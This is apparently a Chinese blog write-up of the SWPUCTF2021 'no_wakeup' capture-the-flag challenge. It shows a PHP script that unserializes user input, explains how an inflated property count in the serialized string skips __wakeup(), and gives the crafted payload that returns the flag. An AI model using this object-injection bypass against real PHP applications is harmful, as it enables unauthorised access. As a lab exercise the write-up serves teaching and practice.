SWPUCTF2021-no_wakeup-wp

题目链接

页面源码

明显反序列化漏洞 但是反序列化会自动调用__wakup()函数 进行sha1加密 难以逆转 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{
        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

绕过wakeup

php特性:当序列化后对象的参数列表中成员个数和实际个数不符合时不调用 __weakup()

1
2
3
4
5
6
7
8
9
10
11
<?php
class HaHaHa{
    public $admin = "admin";
    public $passwd = "wllm";
}

echo serialize(new HaHaHa) . "\n";

# O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
# 将个数2改为3 得到   O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
# 发送得到flag
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP